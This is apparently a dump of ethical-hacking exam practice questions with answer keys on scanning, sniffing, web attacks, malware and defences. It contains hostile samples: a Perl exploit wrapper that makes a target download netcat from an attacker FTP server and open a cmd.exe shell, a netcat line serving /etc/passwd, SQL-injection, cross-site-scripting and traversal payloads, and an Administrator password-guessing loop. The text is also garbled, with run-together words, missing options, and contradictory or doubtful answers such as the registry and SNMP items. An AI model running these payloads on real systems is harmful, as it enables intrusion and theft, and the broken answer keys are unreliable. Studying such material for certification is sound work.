Matthew re-injects a captured wireless packet back onto the network. He does this hundreds oftimes within a second. The packet is correctly encrypted and Matthew assumes it is an ARPrequest packet. The wireless host responds with a stream of responses, all individually encryptedwith different IVs. What is this attack most appropriately called?A. Injection attackB. Replay attackC. Rebound attackD. Spoof attack
B. Replay attack. A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack.)
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames ontothe wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?A. 0xDDDDDDDDDDDDB. 0xFFFFFFFFFFFFC. 0xBBBBBBBBBBBBD. 0xAAAAAAAAAAAA
B. 0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame.
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?A. Stealth keyloggerB. Hardware keyloggerC. Software keyloggerD. Covert keylogger
B. Hardware keyloggerAs thehardware keylogger never interacts with the OS, it is undetectable by anti-virus or anti-spyware products.
What is the expected result of the following exploit?#################################################################$port = 53;# Spawn cmd.exe on port X$your = "192.168.1.1";# Your FTP Server$user = "Anonymous";# login as$pass = 'noone@nowhere.com';# password#################################################################$host = $ARGV[0];print "Starting ...\n";print "Server will download the file nc.exe from $your FTP server.\n";system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");print "Server is downloading ...\n";system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");print "Press ENTER when download is finished ... (That's why it's good to have your own ftpserver)\n";$o=; print "Opening ...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");print "Done.\n";#system("telnet $host $port"); exit(0);A. Opens up a telnet listener that requires no username or passwordB. Creates an FTP server with write permissions enabledC. Creates a share called "sasfile" on the target systemD. Opens an account with a username of Anonymous and a password of noone@nowhere.com
A. Opens up a telnet listener tha trequires no username or password.The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) -- $port,$your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username,and FTP password. $host is set to argument variable 0 (which means the string typed directly afterthe command). Essentially what happens is it connects to an FTP server and downloads nc.exe(the TCP/IP swiss-army knife -- netcat)and uses nc to open a TCP port spawning cmd.exe(cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NOusername or password and has the permissions of the username it is being executed as (probablyguest in this instance, although it could be administrator). The #'s in the script means the textfollowing is a comment, notice the last line in particular, if the # was removed the script would spawn a connection to itself, the host system it was running on.
What are the four existing Regional Internet Registry (RIR's)?A. RIPE NCC, LACNIC, ARIN, APNICB. RIPE NCC, NANIC, ARIN, APNICC. RIPE NCC, ARIN, APNIC, LATNICD. APNIC, PICNIC, ARIN, LACNIC
A. RIPE NCC, LACNIC, ARIN, APNICAll other answers includenon existing organizations (PICNIC, NANIC, LATNIC). See
What type of port scan is shown below?Scan directed at open port:ClientServer192.5.2.92:4079 ---------FIN--------->192.5.2.110:23192.5.2.92:4079 <----NO RESPONSE------192.5.2.110:23Scan directed at closed port:ClientServer192.5.2.92:4079 ---------FIN--------->192.5.2.110:23192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
D. FIN scan
Clive has been hired to perform a Black-Box test by one of his clients. How much information willClive be able to get from the client before commencing his test?A. Only the IP address rangeB. All that is available from the clientC. Nothing but corporate nameD. IP Range, OS, and patches installed
C. Nothing but the corporate name. Pen tests can be conducted as black box or white box. Black Box means that the tester has no prior knowledge of the infrastructure to be tested. White Box means that the pen tester has complete knowledge of the infrastructure.
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety ofplatforms. In order to use this tool on the Windows platform you must install a packet capturelibrary. What is the name of this library?A. NTPCAPB. WinPCAPC. PCAPD. LibPCAP
B. WinPCAPWin PCAP is the industry standard tool for link-layer network access in Windows environments. It allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine, and support for remote packet capture.
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriendshim at the canteen and tags along with him on the pretext of appraising him about potential taxbenefits. Jason waits for Jake to swipe his access card and follows him through the open door intothe secure systems area. How would you describe Jason's behavior within a security context?A. Swipe GatingB. Smooth TalkingC. TrailingD. Tailgating
D. Tailgating
What is Cygwin?A. Cygwin isa X Windows GUI subsytem that runs on top of Linux GNOME environmentB. Cygwin is a free C++ compiler that runs on WindowsC. Cygwin is a freeUnix subsystem that runs on top of WindowsD. Cygwin is a free Windows subsystem that runs on top of Linux
C. Cygwin is a free Unix subsystem that runs on top of windows. Cygwin is a Linux-like environment for Windows. It consists of two parts: A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API functionality, and a collection of tools which provide Linux look and feel.
Which type of scan does not open a full TCP connection?A. Stealth ScanB. XMAS ScanC. Null ScanD. FIN Scan
A. A stealth scan.Instead of completing the full TCP three-way-handshake a full connection is notmade. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed thatthe port on the system is active. In that case a RST/ACK will be sent which will determined thelistening state the system is in. If a RST/ACK packet is received, it is assumed that the port on thesystem is not active.
Which of the following commands will you run in Linux to check for the presence of rootkits?A. $ sudo runvirusB. $ sudo avcheckC. $ sudo chrootkitD. $ sudo rootvirus
C. $ sudochrootkit
Travis works primarily from home as a medical transcriptionist.He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM.He uses voice recognition software to help him transfer what he dictates to electronic documents.The voice recognition software is processor intensive, which is why he bought the new computer.Travis frequently has to get on the Internet to do research on what he is working on.After about two months of working on his new computer, he notices that it is not running nearly asfast as it used to.Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-datewith Microsoft patches.After another month of working on the computer, Travis' computer is even more noticeably slow.Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quicklydisappear.He has seen these windows show up, even when he has not been on the Internet.Travis is really worried about his computer because he spent a lot of money on it, and he dependson it to work. Travis scans his computer with all kinds of software, and cannot find anything out ofthe ordinary. Travis decides to go through Windows Explorer and check out the file system, folderby folder, to see if there is anything he can find. He spends over four hours pouring over the filesand folders and cannot find anything.But, before he gives up, he notices that his computer onlyhas about 10 GB of free space available.Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd.Travis downloads Space Monger and adds up the sizes for all the folders and files on hiscomputer. According to his calculations, he should have around 150 GB of free space. What is most likely the cause of Travis' problems?A. Travis's computer is infected with Self-Replication Worm that fills the hard disk spaceB. Logic Bomb is triggered at random times creating hidden data consuming junk filesC. Travis's computer is infected with a stealth kernel level rootkitD. Travis's computer is infected with Stealth Trojan Virus
C. Travis's computer is probably infected with a stealth kernel root-kit.A rootkit can take full control of a system. A rootkit's only purpose is to hide files, networkconnections, memory addresses, or registry entries from other programs used by systemadministrators to detect intended or unintended special privilege accesses to the computer resources.
Joseph has just been hired on to a contractor company of the Department of Defense as theirSenior Security Analyst. Joseph has been instructed on the company's strict security policies thathave been implemented, and the policies that have yet to be put in place. Per the Department ofDefense, all DoD users and the users of their contractors must use two-factor authentication toaccess their networks. Joseph has been delegated the task of researching and implementing thebest two-factor authentication method for his company. Joseph's supervisor has told him that theywould like to use some type of hardware device in tandem with a security or identifying pinnumber.Joseph's company has already researched using smart cards and all the resources needed toimplement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication?A. Proximity cardsB. Security tokenC. Biometric deviceD. OTP
B. Security Token
Paul has just finished setting up his wireless network.?He has enabled numerous security featuressuch as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on hiswireless router. Paul notices that when he uses his wireless connection, the speed is sometimes54 Mbps and sometimes it is only 24Mbps or less. Paul connects to his wireless router'smanagement utility and notices that a machine with an unfamiliar name is connected through hiswireless connection. Paul checks the router's logs and notices that the unfamiliar machine has thesame MAC address as his laptop.What is Paul seeing here?A. MAC spoofingB. MacofC. ARP spoofingD. DNS spoofing
A. MAC spoofing. You can fool MAC filtering by spoofing your MAC address and pretending to have another computer's MAC address.
You perform the following traceroute and notice that hops 19 and 20 both show the same IP address. What does this most likely indicate?1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net(68.100.0.1) 16.743 ms 16.207 ms4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 msA. A HoneypotB. A host based IDSC. A stateful inspection firewallD. An application proxying firewall
C. A stateful inspection firewall.
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or decoding the hash.A. Brute Force AttacksB. John the Ripper AttacksC. Cryptography AttacksD. Replay Attacks
D. Replay Attacks. A replay attack is a form of a network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.
In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications he is using in his office. Soon after the implementation, users begin complaining about the wireless network slowing down. After benchmarking the network's speed, Bob discovers that throughput has dropped by almost half, even though the number of users has remained the same. What do you think is the reason behind this?A. VPNs use larger packets than wireless networks normally doB. Using a VPN with wireless doubles the overhead on an access point for all directclient to access point communicationsC. Using a VPN on wireless automatically enables WEP, which causes additional overheadD. The stronger encryption used by the VPN slows down the network
B. Using a VPN with wireless doubles the overhead on an access point for all directclient to access point communications. By applying VPN the access point will have to recalculate all headers destined for client and from clients twice.
Which of the following attacks takes best advantage of an existing authenticated connectionA. Session HijackingB. Password GuessingC. Password SniffingD. Spoofing
A. Session hijacking.
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable?A. A UDP scanB. A FIN scanC. A TCP Connect scanD. A half-scan
A. A TCP connect scanA TCP Connect scan, named after the Unix connect( ) system call is the most accurate scanningmethod. If a port is open the operating system completes the TCP three-way handshake, and theport scanner immediately closes the connection. Otherwise an error code is returned.
Given the following extract from the snort log on a honeypot, what service is being exploited?A. SSHB. SMTPC. FTPD. Telnet
C. FTPThe connection is done to 172.16.1.104:21
You have initiated an active operating system fingerprinting attempt with nmap against a targetsystem:root@ceh NG]# /usr/local/bin/nmap -sT -O 10.0.0.1Starting nmap 3.28 ( www.insecure.org/nmap/) at 2003-06-18 19:14 IDTnteresting ports on 10.0.0.1:The 1628 ports scanned but not shown below are in state: closed)Port State Service21/tcp filtered ftp2/tcp filtered ssh5/tcp open smtp0/tcp open http35/tcp open loc-srv39/tcp open netbios-ssn89/tcp open LDAP43/tcp open https65/tcp open smtps029/tcp open ms-lsa433/tcp open ms-sql-s301/tcp open compaqdiag555/tcp open freeciv800/tcp open vnc-http900/tcp open vnc000/tcp filtered X11Remote operating system guess: Windows XP, Windows 2000, NT4 or 95/98/98SEmap run completed -- 1 IP address (1 host up) scanned in 3.334 secondsUsing its fingerprinting tests nmap is unable to distinguish between different groups of Microsoftbased operating systems - Windows XP, Windows 2000, NT4 or 95/98/98SE.What operating system is the target host running based on the open ports shown above?A. Windows 98 SEB. Windows 2000 ServerC. Windows NT4 ServerD. Windows XP
B. WIndows 2000 ServerThe system is reachable as an active directory domain controller (port 389, LDAP)
Frederickson Security Consultants is currently conducting a security audit on the networks ofHawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprisesconducts business daily with the federal government, they must abide by very stringent securitypolicies. Frederickson is testing all of Hawthorn's physical and logical security measures includingbiometrics, passwords, and permissions.The federal government requires that all users must utilize random, non-dictionary passwords thatmust take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees usea random password generator for their network passwords. The Frederickson consultants havesaved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try andcrack the network passwords.What method of attack is best suited to crack these passwords in the shortest amount of time?A. Birthday attackB. Brute service attackC. Brute force attackD. Dictionary attack
C. Brute Force Attack
What does the following command in netcat do?nc 55555 < /etc/passwdA. loads the /etc/passwd file to the UDP port 55555B. logs the incoming connections to /etc/passwd fileC. deletes the /etc/passwd file when connected to the UDP port 55555D. grabs the /etc/passwd file when connected to UDP port 55555
D. Grabs the /etc/passwd file when connected to UDP port 55555.-l forces netcat to listen for incoming connections-u tells netcat to use UDP instead of TCP--p 55555 tells netcat to use port 55555< /etc/passwd tells netcat to grab the /etc/passwd file when connected.
Which of the following Exclusive OR transforms bits is NOT correct?A. 0 xor 0 = 0B. 1 xor 0 = 1C. 0 xor 1 = 1D. 1 xor 1 = 1
D. 1 xor 1 = 1
Once an intruder has access to a remote system with a valid username and password, theattacker will attempt to increase his privileges by escalating the compromised account to onehaving increased privileges, such as that of an administrator. What would be the best countermeasure to protect against such escalation?A. Give users tokensB. Give user the least amount of privilegesC. Give users a strong policy documentD. Give users two passwords
B. Give users the least amount of privileges. The doctrine of least privilege means that it is harder to increase privileges.
Steven is a senior security analyst for a state agency in Tulsa, Oklahoma. His agency is currently undergoing a mandated security audit by an outside consulting firm. The consulting firm is halfwaythrough the audit and is preparing to perform the actual penetration testing against the agency's network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable amount of traffic to analyze later. This takes approximately 2 hours to obtain 10 GB of data. Theconsulting firm then sets up a sniffer on the agency's wireless network to capture the same amount of traffic.This capture only takes about 30 minutes to get 10 GB of data. Why did the capturing of traffic take much less time on the wireless network?A. Because all traffic is clear text, even when encryptedB. Because wireless networks cannot enable encryptionC. Because wireless traffic uses only UDP which is easier to sniffD. Because wireless access points act like hubs on a network
D. Because wireless access points act like hubs on a network.
How would you describe a simple yet very effective mechanism for sending and receivingunauthorized information or data between machines without alerting any firewalls and IDS's on anetwork?A. Crafted ChannelB. Deceptive ChannelC. Bounce ChannelD. Covert Channel
D. Covert channel.A covert channel is described as "any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy." Essentially, it is a method of communication that is not part of the actual computer system design, but can be used ot transfer information to users or system processes that normally would not be allowed access to the information.
While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they are using MAC filtering by using ACLs on the access points. What would be the easiest way to circumvent this and connect to the WLAN?A. Steal a client computer and use it to access the wireless networkB. Attempt to brute force the access point and update or delete the MAC ACL'sC. Attempt to crack the WEP key using AirsnortD. Sniff traffic off the WLAN and spoof your MAC address to the one that you have captured
D. The easiest way to grain access to the WLAN would be to spoof your MAC address to one that already exists on the network.
Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well.Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?A. Dan cannot spoof his IP address over TCP networkB. The server will send replies back to the spoofed IP addressC. Dan can establish an interactive session only if he uses a NATD. The scenario is incorrect as Dan can spoof his IP and get responses
B. The server will send replies back to the spoofed IP address. Spoofing your IP address is only effective when there's no need to establish a two-way connection, as all traffic meant ot go to the attacker will end up at the spoofed address.
You receive an e-mail with the following text message."Microsoft and AOL today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allowshackers to access your computer. Delete the file immediately. Please also pass this message toall your friends and colleagues as soon as possible."You launch your antivirus software and scan the suspicious looking file hidserv.exe located inc:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service."What category of virus is this?A. Spooky VirusB. Virus hoaxC. Polymorphic VirusD. Stealth Virus
B. Virus hoax.
Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice'smachine. From the command prompt, she types the following command.For /f okens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:dministrator?%%aWhat is Eve trying to do?A. Eve is trying to carry out a password crack for user AdministratorB. Eve is trying to escalate privilege of the null user to that of AdministratorC. Eve is trying to connect asan user with Administrator privilegesD. Eve is trying to enumerate all users with Administrative privileges
A. Eve is trying to carry out a password crack for user Administrator.Eve is trying to get a successful login using the name Administrator and passwords from the file hackfile.txt
Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at http://www.masonins.com/. Joseph uses his laptop computer regularly for websiteadministration. One night, an associate notifies Joseph that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message ''H@cker Mess@ge: Y0u @re De@d! Fre@ks! ''Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph logged off the company's internal LAN and accessed the company Web site using his dialup ISP connection. He browsed to http://www.masonins.com/ and saw the following on the web page:H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d!Fre@ksmailto:Fre@ks!After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internalnetwork, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire againstthe entire Web site, and found that every system file and all the Web content on the server wereintact.How did the attacker accomplish this hack?A. ARP spoofingB. Routing table injectionC. SQL injectionD. DNS poisoning
D. DNS PoisoningExternal calls for the Web site has been redirected to another server by a successful DNSpoisoning.
Stephanie works as a records clerk in a large office building in downtown Chicago.On Monday,she went to a mandatory security awareness class (Security5) put on by her company's ITdepartment.During the class, the IT department informed all employees that everyone's Internetactivity was thenceforth going to be monitored.Stephanie is worried that her Internet activity might give her supervisor reason to write her up, orworse get her fired.Stephanie's daily work duties only consume about four hours of her time, soshe usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internetbut definitely does not want to get fired for it.What should Stephanie use so that she does not get in trouble for surfing the Internet?A. Stealth FirefoxB. Cookie DisablerC. Stealth AnonymizerD. Stealth IE
C. Stealth Anonymizer
Identify SQL injection attack from the HTTP requests shown below:A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999B.http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00C.http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3eD. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
B. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00The correct answer contains the code to alter the usertable in order to change thepassword for user smith to hAx0r
Liza has forgotten her password to an online bookstore. The web application asks her to key in heremail so that they can send her the password. Liza enters her email liza@yahoo.com'. Theapplication displays server error. What is wrong with the web application?A. The email is not validB. User input is not sanitizedC. The ISP connection is not reliableD. The web server may be down
B. User input is not sanitized All input from web browsers, such as user data from HTML forms and cookies, must be stripped ofspecial characters and HTML tags as described in the following CERT advisories:http://www.cert.org/advisories/CA-1997-25.htmlhttp://www.cert.org/advisories/CA-2000-02.html
You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create anexecutable file chess.exe. This Trojan when executed on the victim machine, scans the entiresystem (A. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoB. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StartC. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\DesktopD. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_CURRENT_USER\SOFTWARE\Microsoft|Windows|CurrentVersion|DesktopHKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when the MACHINE is rebooted
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventionalhacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate anotherwise impenetrable system.How would you proceed?A. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniquesB. Look for "zero-day" exploits at various underground hacker websites in Russia and Chinaand buy the necessary exploits from these hackers and target the bank's networkC. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information.
You come across a WiFi network in your neighborhood. You pull up your hardware WiFi snifferfrom your car and tune into 802.11a network to sniff the Wireless traffic for sensitive data. Whatfrequency will you tune the Wireless hardware device to?A. 900MHz-2.462 GHzB. 5.15-5.825 GHzC. 2.323-2.462 GHzD. 2.412-2.462 GHz
B. 5.15 - 5.825 GHz
Which programming language is NOT vulnerable to buffer overflow attacks?A. Assembly LanguageB. C++C. ActiveXD. Java
D. JavaPerl and Java have boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some applications require.
SNMP is a protocol used to query hosts, servers, and devices about performance or health statusdata. Hackers have used this protocol for a long time to gather great amount of information aboutremote hosts. Which of the following features makes this possible?A. It uses TCP as the underlying protocolB. It uses a community string sent as clear textC. It is susceptible to sniffingD. It is used by ALL devices on the market
B. It uses a community string sent as cleartextC. It is susceptible to sniffing. SNMP uses UDP, not TCP, and even though many devices use SNMP, not all devices use it and it can be disabled on most of the devices that do use it. However, SNMP is susceptible to sniffing and the community string (which can be said to act as a password) is sent in cleartext.
Fingerprinting an Operating System helps a cracker because:A. It doesn't depend on the patches that have been applied to fix existing security holesB. It opens a security-delayed window based on the port being scannedC. It informs the cracker of which vulnerabilities he may be able to exploit on your systemD. It defines exactly what software you have installed
C. When a cracker knows what OS and services you use, he also knows which exploits might work on your system. If he would have to try all possible exploits for all possible OSs and Services, it would take too much time and the possibility of detection would be much higher.
A program that defends against a port scanner will attempt to:A. Log a violation and recommend use of security-auditing toolsB. Update a firewall rule in real time to prevent the port scan from being completedC. Sends back bogus data to the port scannerD. Limit access by the scanning system to publicly available ports only
B. Update a firewall rule in realtime to prevent the port scan from being completed.
Statistics from cert.org and other leading security organizations have clearly shown a steadyincrease in the number of hacking incidents against companies. What do you think is the mainreason we have seen such a huge increase in hacking attempts over the past years?A. Increase in processing powerB. It is getting harder to hack and more challenging for non technical peopleC. The ease of getting hacker tools on the InternetD. New TCPIP stack features are constantly being added
C. The ease of getting hacker tools on the Internet.
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker.After performing routine maintenance on his servers, hediscovers numerous remote tools were installed that no one claims to have knowledge of in his department.Gerald logs onto the management console for his IDS and discovers an unknown IP address thatscanned his network constantly for a week and was able to access his network through a highlevel port that was not closed.Gerald traces the IP address he found in the IDS log to a proxy server in Brazil.Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland.Gerald calls the company in Switzerlandthat owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China.What tool has Gerald's attacker used to cover their tracks?A. IASB. CheopsC. ISAD. Tor
D. TorTor is a network of virtual tunnels tha tallows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. it provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote websites from tracking them or their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local ISPs.
You want to carry out session hijacking on a remote server. The server and the client arecommunicating via TCP after a successful TCP three-way handshake. The server has justreceived packet #120 from the client. The client has a receive window of 200 and the server has areceive window of 250. What is the range of packet sequence numbers that would be accepted bythe server?A. 121-371B. 120-370C. 200-250D. 121-231E. 120-321
A. 121-371Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250).
Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access. What type of attack is Henryusing?A. Henry is using a denial of service attack which is a valid threat used by an attackerB. Henry uses poorly designed input validation routines to create or alter commands to gainaccess to unintended data or execute commandsC. Henry is executing commands or viewing data outside the intended target pathD. Henry is taking advantage of an incorrect configuration that leads to access with higher-than expectedprivilege
A. Henry is using a DoS attack, which is a valid threat used by an attacker.Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses systems other than his own to perform the attack in order to cover the trail back to him, and to get more "punch" in the DoS attack by using multiple systems.
Steve scans the network for SNMP enabled devices. Which port number Steve should scan?A. 161B. 169C. 150D. 69
A. 161 The default SNMP port is 161. Port 69 is for TFTP, Port 150 is for SQL-NET and 169 is for SEND.
The GET method should never be used when sensitive data such as credit card is being sent to a CGI program. This is because any GET command will appear in the URL, and will be logged by any servers. For example, let's say that you've entered your credit card information into a form thatuses the GET method. The URL may appear like this:https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information.How would you protect from this type of attack?A. Replace the GET with POST method when sending dataB. Encrypt the data before you send using GET methodC. Never include sensitive information in a scriptD. Use HTTPS SSLv3 to send the data instead of plain HTTPS
A. Replace GET with POST method when sending data. If the method is "Get" the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-for-urlencoded content type. The user agent then traverses the link to this URL. If the method is "post" the user agent conducts an HTTP post transaction using the value of hte action attribute and a message is created according to the content type specified by the enctype attribute.

What is the command used to create a binary log file using tcpdump? A. tcpdump -r log B. tcpdump -l /var/log/ C. tcpdump -vde log D. tcpdump -w ./log

D. tcpdump -w ./log
Jonathan being a keen administrator has followed all of the best practices he could find onsecuring his Windows Server. He renamed the Administrator account to a new name that cannotbe easily guessed but there remain people who attempt to compromise his newly renamedadministrator account. How can a remote attacker decipher the name of the administrator accountif it has been renamed?A. The attacker used the sid2user programB. The attacker guessed the new nameC. The attacker used the user2sid programD. The attacker used NMAP with the V switch
A. The attacker used the sid2user program. User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug, but clal teh functions LookupAccountName and LookupAccountSid respectively. These can then be called against a remote machine without providing logon credentials, except for those needed for a null session connection.
Take a look at the following attack on a Web Server using obstructed URL:http://www.example.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64This request is made up of:.%2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../.%65%74%63 = etc.%2f = /.%70%61%73%73%77%64 = passwdHow would you protect from these attacks? A. Configure the web-server to deny requests involving "hex encoded characters."B. Use SSL authentication on web-serversC. Create rules in IDS to alert on strange Unicode requestsD. Enable Active Scripts Detection at the firewall and routers.
C. Create rules in IDS to alert on strange Unicode requests. This is a typical Unicode attack. By configuring your IDS to trigger on strange Unicode requests, you can protect your web-server from this kind of attack.
Steven the hacker realizes the network administrator of Acme Corporation is using syskey inWindows 2000 Server to protect his resources in the organization. Syskey independently encryptsthe hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker"targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits doesSyskey use for encryption?A. 64-bit encryptionB. 128-bit encryptionC. 40-bit encryptionD. 256-bit encryption
B. 128-bit encryptionSYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations areterminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?A. A buffer overflow attack has been attemptedB. A buffer overflow attack has already occurredC. The system has crashedD. An intrusion detection system has been triggeredE. A firewall has been breached and this is logged
A. A buffer overflow attack has been attempted. Terminator canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF and -1. The undesirable result is that the canary is then known.
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;What attack is being depicted here?A. Cookie StealingB. Parameter ManipulationC. Session HijackingD. Cross Site Scripting
B. Parameter manipulationCookies are the preferred method to maintain state in the stateless HTTP protocol. They are, however, also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure, can be modified by the client and sent to the server with URL requests. Therefore, any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified, but this is not true--tools like Winhex are freely available. SSL also only protects the cookie in transit.
